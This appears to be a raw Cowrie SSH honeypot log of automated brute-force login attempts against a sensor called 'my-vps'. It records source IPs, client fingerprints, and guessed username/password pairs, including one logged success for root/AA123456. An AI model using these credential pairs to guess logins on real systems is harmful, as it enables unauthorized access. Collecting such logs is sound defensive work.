{"eventid":"cowrie.login.failed","username":"ajarami","password":"123456","message":"login attempt [ajarami/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:26:13.803695Z","src_ip":"212.227.235.229","session":"24e89a429dbd"}
{"eventid":"cowrie.login.failed","username":"test","password":"P@ssw0rd123","message":"login attempt [test/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:26:14.334036Z","src_ip":"212.227.235.229","session":"de8e48fd5781"}
{"eventid":"cowrie.login.failed","username":"ansadmin","password":"ansadmin123","message":"login attempt [ansadmin/ansadmin123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:26:14.499461Z","src_ip":"212.227.235.229","session":"42cdd1a96c8e"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:26:14.886474Z","src_ip":"212.227.235.229","session":"24e89a429dbd"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:26:15.754510Z","src_ip":"212.227.235.229","session":"42cdd1a96c8e"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:26:16.143513Z","src_ip":"212.227.235.229","session":"de8e48fd5781"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":49468,"dst_ip":"1.2.3.4","dst_port":22,"session":"77b0f1bb150f","protocol":"ssh","message":"New connection: 170.64.166.123:49468 (1.2.3.4:22) [session: 77b0f1bb150f]","sensor":"my-vps","timestamp":"2025-08-31T05:26:24.150657Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:26:24.151868Z","src_ip":"170.64.166.123","session":"77b0f1bb150f"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:26:24.426863Z","src_ip":"170.64.166.123","session":"77b0f1bb150f"}
{"eventid":"cowrie.login.failed","username":"jenkins","password":"dell-2020","message":"login attempt [jenkins/dell-2020] failed","sensor":"my-vps","timestamp":"2025-08-31T05:26:25.571241Z","src_ip":"170.64.166.123","session":"77b0f1bb150f"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:26:26.848545Z","src_ip":"170.64.166.123","session":"77b0f1bb150f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":39578,"dst_ip":"1.2.3.4","dst_port":22,"session":"43b63250e019","protocol":"ssh","message":"New connection: 212.227.125.160:39578 (1.2.3.4:22) [session: 43b63250e019]","sensor":"my-vps","timestamp":"2025-08-31T05:26:28.981985Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52430,"dst_ip":"1.2.3.4","dst_port":22,"session":"737d0d14b6d5","protocol":"ssh","message":"New connection: 212.227.125.160:52430 (1.2.3.4:22) [session: 737d0d14b6d5]","sensor":"my-vps","timestamp":"2025-08-31T05:26:29.233198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:26:29.440288Z","src_ip":"212.227.125.160","session":"43b63250e019"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:26:29.441002Z","src_ip":"212.227.125.160","session":"43b63250e019"}
{"eventid":"cowrie.login.failed","username":"test","password":"P@ssw0rd123","message":"login attempt [test/P@ssw0rd123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:26:32.064075Z","src_ip":"212.227.125.160","session":"43b63250e019"}
{"eventid":"cowrie.session.closed","duration":"4.7","message":"Connection lost after 4.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:26:33.639349Z","src_ip":"212.227.125.160","session":"43b63250e019"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:26:48.865279Z","src_ip":"212.227.125.160","session":"737d0d14b6d5"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:26:49.005497Z","src_ip":"212.227.125.160","session":"737d0d14b6d5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48764,"dst_ip":"1.2.3.4","dst_port":22,"session":"164e1f5a5c2a","protocol":"ssh","message":"New connection: 212.227.235.229:48764 (1.2.3.4:22) [session: 164e1f5a5c2a]","sensor":"my-vps","timestamp":"2025-08-31T05:26:49.937769Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:26:49.938756Z","src_ip":"212.227.235.229","session":"164e1f5a5c2a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:26:50.210845Z","src_ip":"212.227.235.229","session":"164e1f5a5c2a"}
{"eventid":"cowrie.login.failed","username":"sas","password":"sas","message":"login attempt [sas/sas] failed","sensor":"my-vps","timestamp":"2025-08-31T05:26:51.335393Z","src_ip":"212.227.235.229","session":"164e1f5a5c2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54700,"dst_ip":"1.2.3.4","dst_port":22,"session":"50a1cc396725","protocol":"ssh","message":"New connection: 212.227.235.229:54700 (1.2.3.4:22) [session: 50a1cc396725]","sensor":"my-vps","timestamp":"2025-08-31T05:26:51.364505Z"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:26:52.609824Z","src_ip":"212.227.235.229","session":"164e1f5a5c2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56454,"dst_ip":"1.2.3.4","dst_port":22,"session":"faa3ff623b62","protocol":"ssh","message":"New connection: 212.227.235.229:56454 (1.2.3.4:22) [session: faa3ff623b62]","sensor":"my-vps","timestamp":"2025-08-31T05:27:06.601232Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:27:07.309373Z","src_ip":"212.227.235.229","session":"faa3ff623b62"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:27:07.311722Z","src_ip":"212.227.235.229","session":"faa3ff623b62"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:27:10.501092Z","src_ip":"212.227.235.229","session":"50a1cc396725"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:27:10.502053Z","src_ip":"212.227.235.229","session":"50a1cc396725"}
{"eventid":"cowrie.login.success","username":"root","password":"AA123456","message":"login attempt [root/AA123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:27:11.705589Z","src_ip":"212.227.235.229","session":"c383fffb3369"}
{"eventid":"cowrie.login.failed","username":"test","password":"letmein","message":"login attempt [test/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T05:27:13.302951Z","src_ip":"212.227.235.229","session":"faa3ff623b62"}
{"eventid":"cowrie.session.closed","duration":"8.5","message":"Connection lost after 8.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:27:15.080031Z","src_ip":"212.227.235.229","session":"faa3ff623b62"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46548,"dst_ip":"1.2.3.4","dst_port":22,"session":"53af558c7070","protocol":"ssh","message":"New connection: 212.227.125.160:46548 (1.2.3.4:22) [session: 53af558c7070]","sensor":"my-vps","timestamp":"2025-08-31T05:27:27.428539Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:27:28.020322Z","src_ip":"212.227.125.160","session":"53af558c7070"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:27:28.021480Z","src_ip":"212.227.125.160","session":"53af558c7070"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52038,"dst_ip":"1.2.3.4","dst_port":22,"session":"65424bd57924","protocol":"ssh","message":"New connection: 212.227.235.229:52038 (1.2.3.4:22) [session: 65424bd57924]","sensor":"my-vps","timestamp":"2025-08-31T05:27:28.023560Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:27:28.024386Z","src_ip":"212.227.235.229","session":"65424bd57924"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:27:28.115550Z","src_ip":"212.227.235.229","session":"65424bd57924"}
{"eventid":"cowrie.login.failed","username":"gabriel","password":"gabriel","message":"login attempt [gabriel/gabriel] failed","sensor":"my-vps","timestamp":"2025-08-31T05:27:28.523859Z","src_ip":"212.227.235.229","session":"65424bd57924"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51836,"dst_ip":"1.2.3.4","dst_port":22,"session":"c72e77b43de6","protocol":"ssh","message":"New connection: 212.227.235.229:51836 (1.2.3.4:22) [session: c72e77b43de6]","sensor":"my-vps","timestamp":"2025-08-31T05:27:29.234042Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:27:29.237805Z","src_ip":"212.227.235.229","session":"c72e77b43de6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:27:29.488904Z","src_ip":"212.227.235.229","session":"c72e77b43de6"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:27:29.616878Z","src_ip":"212.227.235.229","session":"65424bd57924"}
{"eventid":"cowrie.login.failed","username":"abc","password":"abc123","message":"login attempt [abc/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:27:30.501096Z","src_ip":"212.227.235.229","session":"c72e77b43de6"}
{"eventid":"cowrie.login.failed","username":"test","password":"letmein","message":"login attempt [test/letmein] failed","sensor":"my-vps","timestamp":"2025-08-31T05:27:30.888002Z","src_ip":"212.227.125.160","session":"53af558c7070"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:27:31.763606Z","src_ip":"212.227.235.229","session":"c72e77b43de6"}
{"eventid":"cowrie.session.closed","duration":"4.9","message":"Connection lost after 4.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:27:32.377777Z","src_ip":"212.227.125.160","session":"53af558c7070"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":46458,"dst_ip":"1.2.3.4","dst_port":22,"session":"3626d6592cbf","protocol":"ssh","message":"New connection: 170.64.166.123:46458 (1.2.3.4:22) [session: 3626d6592cbf]","sensor":"my-vps","timestamp":"2025-08-31T05:27:40.129045Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:27:40.129967Z","src_ip":"170.64.166.123","session":"3626d6592cbf"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:27:40.404620Z","src_ip":"170.64.166.123","session":"3626d6592cbf"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"1q2w3e!@#","message":"login attempt [postgres/1q2w3e!@#] failed","sensor":"my-vps","timestamp":"2025-08-31T05:27:41.544563Z","src_ip":"170.64.166.123","session":"3626d6592cbf"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:27:42.821636Z","src_ip":"170.64.166.123","session":"3626d6592cbf"}
